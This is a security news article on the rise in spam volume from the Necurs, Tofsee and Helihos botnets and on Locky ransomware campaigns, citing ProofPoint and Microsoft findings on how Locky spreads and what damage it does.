Spam email volume has dropped a lot over the past few years after the takedown of key botnets – and individuals – behind some of the largest spamming attacks. It was beginning to look like the super-spamming days of the early 2010s were no more. However, spam email volume has been on the rise in recent months.
Necurs botnet activity has grown and last month the Tofsee botnet was resurrected. Both of these botnets had previously been used to send annoying but relatively harmless spam emails offering cheap pharmaceuticals and offers of Russian wives. However, the growth in activity is also matched with the move to malicious email attachments containing malware and ransomware.
These and other botnets like Helihos are also rising in volume at alarming rates and spam email volume is soaring. Some reports indicate spam email volume has increased from around 200,000 spam emails per second to 450,000 emails per second over the past few months.
Locky ransomware first was seen in February 2016. It has since become one of the most significant email threats. The ransomware is being sent in massive spam campaigns and increasingly complex social engineering techniques are used to infect end users.
To put these email campaigns into some perspective, historically, the amount of spam email used to send malware, ransomware, and other email nasties stood at around 2% of the overall spam email volume. By around April this year, two months after Locky was initially seen, malicious spam emails including the ransomware accounted for around 18% of total spam email volume.
The Quarterly Threat Report published by ProofPoint earlier this month suggests the volume of spam email including malicious attachments or links reached record levels in quarter 3, 2016. Most of those emails included Locky. According to the report released, 97% of captured spam emails with malicious attachments were used to send Locky. That’s a 28% rise from Q2, and a 64% rise since Q1.
Since its release, Locky ransomware has been attacking users through Word documents containing malicious macros, JavaScript files, executable HTML files (HTA), and more recently Windows Script Files (WSF) hiding the Nemucod downloader. Now, another evolution of this virus has been detected. Earlier this month, researchers at the Microsoft Malware Protection Center saw that the the actors behind Locky ransomware had made another change to the way they infect computers and made the change to shortcut files (LNK) containing PowerShell commands.
This discovery came along with a drop in detection and a relatively quiet period for the past two weeks. However, Locky is back with a bang. On Monday this week, three new campaigns were discovered, one of which was massive and involved 14 million messages in around half a day. 6 million of those messages were sent in just one hour.
The threat posed by Locky is considerable. Locky is capable of destroying Windows Shadow Files and encrypting a wide variety of data, including data on portable storage devices and network drives. Resolving an attack can prove extremely expensive.
